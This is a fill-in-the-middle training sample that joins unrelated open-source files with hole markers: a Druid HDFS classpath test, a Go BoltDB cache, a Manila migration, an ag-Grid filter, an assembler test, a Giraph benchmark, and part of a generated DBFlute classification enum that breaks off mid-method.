}<|fim▁end|> | this.tag = notNull(tag); |
<|file_name|>HdfsClasspathSetupTest.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.indexer;
import com.google.common.util.concurrent.Futures;
import com.google.common.util.concurrent.ListenableFuture;
import com.google.common.util.concurrent.ListeningExecutorService;
import com.google.common.util.concurrent.MoreExecutors;
import org.apache.commons.io.IOUtils;
import org.apache.druid.common.utils.UUIDUtils;
import org.apache.druid.java.util.common.FileUtils;
import org.apache.druid.java.util.common.IOE;
import org.apache.druid.java.util.common.StringUtils;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hdfs.DistributedFileSystem;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.apache.hadoop.mapreduce.Job;
import org.apache.hadoop.mapreduce.MRJobConfig;
import org.junit.After;
import org.junit.AfterClass;
import org.junit.Assert;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.TemporaryFolder;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.StandardCopyOption;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.Callable;
import java.util.concurrent.CyclicBarrier;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
public class HdfsClasspathSetupTest
{
private static MiniDFSCluster miniCluster;
private static File hdfsTmpDir;
private static Configuration conf;
private static String dummyJarString = "This is a test jar file.";
private File dummyJarFile;
private Path finalClasspath;
private Path intermediatePath;
@Rule
public final TemporaryFolder tempFolder = new TemporaryFolder();
@BeforeClass
public static void setupStatic() throws IOException
{
hdfsTmpDir = File.createTempFile("hdfsClasspathSetupTest", "dir");
if (!hdfsTmpDir.delete()) {
throw new IOE("Unable to delete hdfsTmpDir [%s]", hdfsTmpDir.getAbsolutePath());
}
conf = new Configuration(true);
conf.set(MiniDFSCluster.HDFS_MINIDFS_BASEDIR, hdfsTmpDir.getAbsolutePath());
miniCluster = new MiniDFSCluster.Builder(conf).build();
}
@Before
public void setUp() throws IOException
{
// intermedatePath and finalClasspath are relative to hdfsTmpDir directory.
intermediatePath = new Path(StringUtils.format("/tmp/classpath/%s", UUIDUtils.generateUuid()));
finalClasspath = new Path(StringUtils.format("/tmp/intermediate/%s", UUIDUtils.generateUuid()));
dummyJarFile = tempFolder.newFile("dummy-test.jar");
Files.copy(
new ByteArrayInputStream(StringUtils.toUtf8(dummyJarString)),
dummyJarFile.toPath(),
StandardCopyOption.REPLACE_EXISTING
);
}
@AfterClass
public static void tearDownStatic() throws IOException
{
if (miniCluster != null) {
miniCluster.shutdown(true);
}
FileUtils.deleteDirectory(hdfsTmpDir);
}
@After
public void tearDown() throws IOException
{
dummyJarFile.delete();
Assert.assertFalse(dummyJarFile.exists());
miniCluster.getFileSystem().delete(finalClasspath, true);
Assert.assertFalse(miniCluster.getFileSystem().exists(finalClasspath));
miniCluster.getFileSystem().delete(intermediatePath, true);
Assert.assertFalse(miniCluster.getFileSystem().exists(intermediatePath));
}
@Test
public void testAddSnapshotJarToClasspath() throws IOException
{
Job job = Job.getInstance(conf, "test-job");
DistributedFileSystem fs = miniCluster.getFileSystem();
Path intermediatePath = new Path("/tmp/classpath");
JobHelper.addSnapshotJarToClassPath(dummyJarFile, intermediatePath, fs, job);
Path expectedJarPath = new Path(intermediatePath, dummyJarFile.getName());
// check file gets uploaded to HDFS
Assert.assertTrue(fs.exists(expectedJarPath));
// check file gets added to the classpath
Assert.assertEquals(expectedJarPath.toString(), job.getConfiguration().get(MRJobConfig.CLASSPATH_FILES));
Assert.assertEquals(dummyJarString, StringUtils.fromUtf8(IOUtils.toByteArray(fs.open(expectedJarPath))));
}
@Test
public void testAddNonSnapshotJarToClasspath() throws IOException
{
Job job = Job.getInstance(conf, "test-job");
DistributedFileSystem fs = miniCluster.getFileSystem();
JobHelper.addJarToClassPath(dummyJarFile, finalClasspath, intermediatePath, fs, job);
Path expectedJarPath = new Path(finalClasspath, dummyJarFile.getName());
// check file gets uploaded to final HDFS path
Assert.assertTrue(fs.exists(expectedJarPath));
// check that the intermediate file gets deleted
Assert.assertFalse(fs.exists(new Path(intermediatePath, dummyJarFile.getName())));
// check file gets added to the classpath
Assert.assertEquals(expectedJarPath.toString(), job.getConfiguration().get(MRJobConfig.CLASSPATH_FILES));
Assert.assertEquals(dummyJarString, StringUtils.fromUtf8(IOUtils.toByteArray(fs.open(expectedJarPath))));
}
@Test
public void testIsSnapshot()
{
Assert.assertTrue(JobHelper.isSnapshot(new File("test-SNAPSHOT.jar")));
Assert.assertTrue(JobHelper.isSnapshot(new File("test-SNAPSHOT-selfcontained.jar")));
Assert.assertFalse(JobHelper.isSnapshot(new File("test.jar")));
Assert.assertFalse(JobHelper.isSnapshot(new File("test-selfcontained.jar")));
Assert.assertFalse(JobHelper.isSnapshot(new File("iAmNotSNAPSHOT.jar")));
Assert.assertFalse(JobHelper.isSnapshot(new File("iAmNotSNAPSHOT-selfcontained.jar")));
}
@Test
public void testConcurrentUpload() throws IOException, InterruptedException, ExecutionException, TimeoutException
{
final int concurrency = 10;
ListeningExecutorService pool = MoreExecutors.listeningDecorator(Executors.newFixedThreadPool(concurrency));
// barrier ensures that all jobs try to add files to classpath at same time.
final CyclicBarrier barrier = new CyclicBarrier(concurrency);
final DistributedFileSystem fs = miniCluster.getFileSystem();
final Path expectedJarPath = new Path(finalClasspath, dummyJarFile.getName());
List<ListenableFuture<Boolean>> futures = new ArrayList<>();<|fim▁hole|> pool.submit(
new Callable()
{
@Override
public Boolean call() throws Exception
{
int id = barrier.await();
Job job = Job.getInstance(conf, "test-job-" + id);
Path intermediatePathForJob = new Path(intermediatePath, "job-" + id);
JobHelper.addJarToClassPath(dummyJarFile, finalClasspath, intermediatePathForJob, fs, job);
// check file gets uploaded to final HDFS path
Assert.assertTrue(fs.exists(expectedJarPath));
// check that the intermediate file is not present
Assert.assertFalse(fs.exists(new Path(intermediatePathForJob, dummyJarFile.getName())));
// check file gets added to the classpath
Assert.assertEquals(
expectedJarPath.toString(),
job.getConfiguration().get(MRJobConfig.CLASSPATH_FILES)
);
return true;
}
}
)
);
}
Futures.allAsList(futures).get(30, TimeUnit.SECONDS);
pool.shutdownNow();
}
}<|fim▁end|> |
for (int i = 0; i < concurrency; i++) {
futures.add( |
<|file_name|>cache.go<|end_file_name|><|fim▁begin|>package config
import (
"log"
"os"
"os/user"
"path/filepath"
"koding/klient/storage"
"koding/tools/util"
"github.com/boltdb/bolt"
)
// CurrentUser represents current user that owns the KD process.
//
// If the process was started with sudo, the CurrentUser represents
// the user that invoked sudo.
var CurrentUser = currentUser()
// CacheOptions are used to configure Cache behavior for New method.
type CacheOptions struct {
File string
BoltDB *bolt.Options
Bucket []byte
Owner *User
}
func (o *CacheOptions) owner() *User {
if o.Owner != nil {
return o.Owner
}
return CurrentUser
}
// Cache is a file-based cached used to persist values between
// different runs of kd tool.
type Cache struct {
*storage.EncodingStorage
}
// NewCache returns new cache value.
//
// If it was not possible to create or open BoltDB database,
// an in-memory cache is created.
func NewCache(options *CacheOptions) *Cache {
db, err := newBoltDB(options)
if err != nil {
log.Println(err)
}<|fim▁hole|> return &Cache{
EncodingStorage: storage.NewEncodingStorage(db, options.Bucket),
}
}
// NewCache returns new cache value backed by BoltDB.
func NewBoltCache(options *CacheOptions) (*Cache, error) {
db, err := newBoltDB(options)
if err != nil {
return nil, err
}
bolt, err := storage.NewBoltStorageBucket(db, options.Bucket)
if err != nil {
return nil, err
}
return &Cache{
EncodingStorage: &storage.EncodingStorage{
Interface: bolt,
},
}, nil
}
func newBoltDB(o *CacheOptions) (*bolt.DB, error) {
dir := filepath.Dir(o.File)
// Best-effort attempts, ignore errors.
_ = os.MkdirAll(dir, 0755)
_ = util.Chown(dir, o.owner().User)
return bolt.Open(o.File, 0644, o.BoltDB)
}
func KodingHome() string {
home := os.Getenv("KODING_HOME")
if _, err := os.Stat(home); err != nil {
home = filepath.Join(CurrentUser.HomeDir, ".config", "koding")
}
return home
}
type User struct {
*user.User
Groups []*user.Group
}
func currentUser() *User {
u := &User{
User: currentStdUser(),
}
ids, err := u.GroupIds()
if err != nil {
return u
}
for _, id := range ids {
if g, err := user.LookupGroupId(id); err == nil {
u.Groups = append(u.Groups, g)
}
}
return u
}
func currentStdUser() *user.User {
u, err := user.Current()
if err != nil {
panic(err)
}
if u.Uid != "0" {
return u
}
if sudoU, err := user.Lookup(os.Getenv("SUDO_USER")); err == nil {
return sudoU
}
if rootU, err := user.Lookup(os.Getenv("USERNAME")); err == nil {
return rootU
}
return u
}<|fim▁end|> | |
<|file_name|>533646c7af38_remove_unused_attr_status.py<|end_file_name|><|fim▁begin|># Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Remove unused attr status
Revision ID: 533646c7af38
Revises: 3a482171410f
Create Date: 2015-05-28 13:13:47.651353<|fim▁hole|>"""
# revision identifiers, used by Alembic.
revision = '533646c7af38'
down_revision = '3a482171410f'
from alembic import op
from oslo_log import log
import sqlalchemy as sql
from manila.common import constants
from manila.i18n import _LE
LOG = log.getLogger(__name__)
COLUMN_NAME = 'status'
TABLE_NAMES = ('network_allocations', 'security_services')
def upgrade():
for t_name in TABLE_NAMES:
try:
op.drop_column(t_name, COLUMN_NAME)
except Exception:
LOG.error(_LE("Column '%s' could not be dropped"), COLUMN_NAME)
raise
def downgrade():
for t_name in TABLE_NAMES:
try:
op.add_column(
t_name,
sql.Column(
COLUMN_NAME,
# NOTE(vponomaryov): original type of attr was enum. But
# alembic is buggy with enums [1], so use string type
# instead. Anyway we have no reason to keep enum/constraint
# on specific set of possible statuses because they have
# not been used.
# [1] - https://bitbucket.org/zzzeek/alembic/
# issue/89/opadd_column-and-opdrop_column-should
sql.String(255),
default=constants.STATUS_NEW,
),
)
except Exception:
LOG.error(_LE("Column '%s' could not be added"), COLUMN_NAME)
raise<|fim▁end|> | |
<|file_name|>year-filter.component_angular.ts<|end_file_name|><|fim▁begin|>import { Component } from '@angular/core';
import { IFilterAngularComp } from "@ag-grid-community/angular";
@Component({
selector: 'year-filter',
template: `
<div class="year-filter">
<label>
<input type="radio" name="isFilterActive" [checked]="!isActive" (change)="toggleFilter(false)" /> All
</label>
<label>
<input type="radio" name="isFilterActive" [checked]="isActive" (change)="toggleFilter(true)" /> After 2004
</label>
</div>`
})
export class YearFilter implements IFilterAngularComp {
params: any;
isActive: boolean;
// called on init
agInit(params: any): void {
this.params = params;
this.isActive = false;
}
toggleFilter(isFilterActive): void {
this.isActive = isFilterActive;
this.params.filterChangedCallback();
}
doesFilterPass(params): boolean {
return params.data.year > 2004;
}
isFilterActive(): boolean {
return this.isActive;<|fim▁hole|> }
setModel(model): void {
this.toggleFilter(!!model);
}
onFloatingFilterChanged(value): void {
this.setModel(value);
}
}<|fim▁end|> | }
getModel(): boolean | null {
return this.isFilterActive() || null; |
<|file_name|>tests.py<|end_file_name|><|fim▁begin|>import unittest
from click.testing import CliRunner
from make_dataset import main
<|fim▁hole|>
class TestMain(unittest.TestCase):
def test_main_runs(self):
runner = CliRunner()
result = runner.invoke(main, ['.', '.'])
assert result.exit_code == 0<|fim▁end|> | |
<|file_name|>bndstx.rs<|end_file_name|><|fim▁begin|>use ::{BroadcastMode, Instruction, MaskReg, MergeMode, Mnemonic, OperandSize, Reg, RoundingMode};
use ::RegType::*;
use ::instruction_def::*;
use ::Operand::*;<|fim▁hole|>
fn bndstx_1() {
run_test(&Instruction { mnemonic: Mnemonic::BNDSTX, operand1: Some(IndirectScaledIndexed(ESI, ECX, One, Some(OperandSize::Unsized), None)), operand2: Some(Direct(BND3)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[15, 27, 28, 14], OperandSize::Dword)
}
fn bndstx_2() {
run_test(&Instruction { mnemonic: Mnemonic::BNDSTX, operand1: Some(IndirectScaledIndexed(RDI, RBX, One, Some(OperandSize::Unsized), None)), operand2: Some(Direct(BND3)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[15, 27, 28, 31], OperandSize::Qword)
}<|fim▁end|> | use ::Reg::*;
use ::RegScale::*; |
<|file_name|>ShortestPathsBenchmark.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.giraph.benchmark;
import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.CommandLineParser;
import org.apache.commons.cli.HelpFormatter;
import org.apache.commons.cli.Options;
import org.apache.commons.cli.PosixParser;
import org.apache.giraph.GiraphConfiguration;
import org.apache.giraph.examples.MinimumDoubleCombiner;
import org.apache.giraph.graph.EdgeListVertex;
import org.apache.giraph.graph.GiraphJob;
import org.apache.giraph.io.PseudoRandomVertexInputFormat;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.io.DoubleWritable;
import org.apache.hadoop.io.LongWritable;
import org.apache.hadoop.util.Tool;
import org.apache.hadoop.util.ToolRunner;
import org.apache.log4j.Logger;
import java.io.IOException;
/**
* Single-source shortest paths benchmark.
*/
public class ShortestPathsBenchmark implements Tool {
/** Class logger */
private static final Logger LOG =
Logger.getLogger(ShortestPathsBenchmark.class);
/** Configuration */
private Configuration conf;
/**
* Vertex implementation
*/
public static class ShortestPathsBenchmarkVertex extends
EdgeListVertex<LongWritable, DoubleWritable, DoubleWritable,
DoubleWritable> {
@Override
public void compute(Iterable<DoubleWritable> messages) throws IOException {
ShortestPathsComputation.computeShortestPaths(this, messages);
}
}
@Override
public Configuration getConf() {
return conf;
}
@Override
public void setConf(Configuration conf) {
this.conf = conf;
}
@Override
public final int run(final String[] args) throws Exception {
Options options = new Options();
options.addOption("h", "help", false, "Help");
options.addOption("v", "verbose", false, "Verbose");
options.addOption("w",
"workers",
true,
"Number of workers");
options.addOption("V",
"aggregateVertices",
true,
"Aggregate vertices");
options.addOption("e",
"edgesPerVertex",
true,
"Edges per vertex");
options.addOption("c",
"vertexClass",
true,
"Vertex class (0 for HashMapVertex, 1 for EdgeListVertex)");
options.addOption("nc",
"noCombiner",
false,
"Don't use a combiner");
HelpFormatter formatter = new HelpFormatter();
if (args.length == 0) {
formatter.printHelp(getClass().getName(), options, true);
return 0;
}
CommandLineParser parser = new PosixParser();
CommandLine cmd = parser.parse(options, args);
if (cmd.hasOption('h')) {
formatter.printHelp(getClass().getName(), options, true);
return 0;
}
if (!cmd.hasOption('w')) {
LOG.info("Need to choose the number of workers (-w)");
return -1;
}
if (!cmd.hasOption('V')) {
LOG.info("Need to set the aggregate vertices (-V)");
return -1;
}
if (!cmd.hasOption('e')) {
LOG.info("Need to set the number of edges " +
"per vertex (-e)");
return -1;
}
int workers = Integer.parseInt(cmd.getOptionValue('w'));
GiraphJob job = new GiraphJob(getConf(), getClass().getName());
if (!cmd.hasOption('c') ||
(Integer.parseInt(cmd.getOptionValue('c')) == 1)) {
job.getConfiguration().setVertexClass(ShortestPathsBenchmarkVertex.class);
} else {
job.getConfiguration().setVertexClass(
HashMapVertexShortestPathsBenchmark.class);
}
LOG.info("Using class " +
job.getConfiguration().get(GiraphConfiguration.VERTEX_CLASS));
job.getConfiguration().setVertexInputFormatClass(
PseudoRandomVertexInputFormat.class);
if (!cmd.hasOption("nc")) {
job.getConfiguration().setVertexCombinerClass(
MinimumDoubleCombiner.class);
}
job.getConfiguration().setWorkerConfiguration(workers, workers, 100.0f);<|fim▁hole|> Long.parseLong(cmd.getOptionValue('V')));
job.getConfiguration().setLong(
PseudoRandomVertexInputFormat.EDGES_PER_VERTEX,
Long.parseLong(cmd.getOptionValue('e')));
boolean isVerbose = false;
if (cmd.hasOption('v')) {
isVerbose = true;
}
if (job.run(isVerbose)) {
return 0;
} else {
return -1;
}
}
/**
* Execute the benchmark.
*
* @param args Typically the command line arguments.
* @throws Exception Any exception from the computation.
*/
public static void main(final String[] args) throws Exception {
System.exit(ToolRunner.run(new ShortestPathsBenchmark(), args));
}
}<|fim▁end|> | job.getConfiguration().setLong(
PseudoRandomVertexInputFormat.AGGREGATE_VERTICES, |
<|file_name|>CDef.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2004-2013 the Seasar Foundation and the Others.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language
* governing permissions and limitations under the License.
*/
package org.docksidestage.mysql.dbflute.allcommon;
import java.util.*;
import org.dbflute.exception.ClassificationNotFoundException;
import org.dbflute.jdbc.Classification;
import org.dbflute.jdbc.ClassificationCodeType;
import org.dbflute.jdbc.ClassificationMeta;
import org.dbflute.jdbc.ClassificationUndefinedHandlingType;
import org.dbflute.optional.OptionalThing;
import static org.dbflute.util.DfTypeUtil.emptyStrings;
/**
* The definition of classification.
* @author DBFlute(AutoGenerator)
*/
public interface CDef extends Classification {
/**
* 会員が受けられるサービスのランクを示す
*/
public enum ServiceRank implements CDef {
/** PLATINUM: platinum rank */
Platinum("PLT", "PLATINUM", emptyStrings())
,
/** GOLD: gold rank */
Gold("GLD", "GOLD", emptyStrings())
,
/** SILVER: silver rank */
Silver("SIL", "SILVER", emptyStrings())
,
/** BRONZE: bronze rank */
Bronze("BRZ", "BRONZE", emptyStrings())
,
/** PLASTIC: plastic rank (deprecated: テーブル区分値の非推奨要素指定のテストのため) */
@Deprecated
Plastic("PLS", "PLASTIC", emptyStrings())
;
private static final Map<String, ServiceRank> _codeClsMap = new HashMap<String, ServiceRank>();
private static final Map<String, ServiceRank> _nameClsMap = new HashMap<String, ServiceRank>();
static {
for (ServiceRank value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private ServiceRank(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.ServiceRank; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<ServiceRank> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof ServiceRank) { return OptionalThing.of((ServiceRank)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<ServiceRank> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static ServiceRank codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof ServiceRank) { return (ServiceRank)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static ServiceRank nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<ServiceRank> listAll() {
return new ArrayList<ServiceRank>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<ServiceRank> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: ServiceRank." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<ServiceRank> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<ServiceRank> clsList = new ArrayList<ServiceRank>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<ServiceRank> groupOf(String groupName) {
return new ArrayList<ServiceRank>(4);
}
@Override public String toString() { return code(); }
}
/**
* mainly region of member address
*/
public enum Region implements CDef {
/** アメリカ */
アメリカ("1", "アメリカ", emptyStrings())
,
/** カナダ */
カナダ("2", "カナダ", emptyStrings())
,
/** 中国 */
中国("3", "中国", emptyStrings())
,
/** 千葉 */
千葉("4", "千葉", emptyStrings())
;
private static final Map<String, Region> _codeClsMap = new HashMap<String, Region>();
private static final Map<String, Region> _nameClsMap = new HashMap<String, Region>();
static {
for (Region value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private Region(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.Region; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<Region> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof Region) { return OptionalThing.of((Region)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<Region> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static Region codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof Region) { return (Region)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static Region nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<Region> listAll() {
return new ArrayList<Region>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<Region> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: Region." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<Region> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<Region> clsList = new ArrayList<Region>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<Region> groupOf(String groupName) {
return new ArrayList<Region>(4);
}
@Override public String toString() { return code(); }
}
    /**
     * reason for member withdrawal
     */
    public enum WithdrawalReason implements CDef {
        /** SIT: because the site is hard to use */
        Sit("SIT", "SIT", emptyStrings())
        ,
        /** PRD: because the products have no appeal */
        Prd("PRD", "PRD", emptyStrings())
        ,
        /** FRT: because of furiten */
        Frt("FRT", "FRT", emptyStrings())
        ,
        /** OTH: other reasons */
        Oth("OTH", "OTH", emptyStrings())
        ;
        // lookup maps keyed by lower-cased code/name so that of()/byName() are case-insensitive
        private static final Map<String, WithdrawalReason> _codeClsMap = new HashMap<String, WithdrawalReason>();
        private static final Map<String, WithdrawalReason> _nameClsMap = new HashMap<String, WithdrawalReason>();
        static {
            for (WithdrawalReason value : values()) {
                _codeClsMap.put(value.code().toLowerCase(), value);
                for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); } // sister codes resolve to the same element
                _nameClsMap.put(value.name().toLowerCase(), value);
            }
        }
        private String _code; private String _alias; private Set<String> _sisterSet;
        private WithdrawalReason(String code, String alias, String[] sisters)
        { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
        public String code() { return _code; } public String alias() { return _alias; }
        public Set<String> sisterSet() { return _sisterSet; }
        public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
        public ClassificationMeta meta() { return CDef.DefMeta.WithdrawalReason; }
        public boolean inGroup(String groupName) {
            return false; // no classification groups are defined for this classification
        }
        /**
         * Get the classification of the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
         * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<WithdrawalReason> of(Object code) {
            if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
            if (code instanceof WithdrawalReason) { return OptionalThing.of((WithdrawalReason)code); }
            if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); } // unwrap a wrapped code before resolving
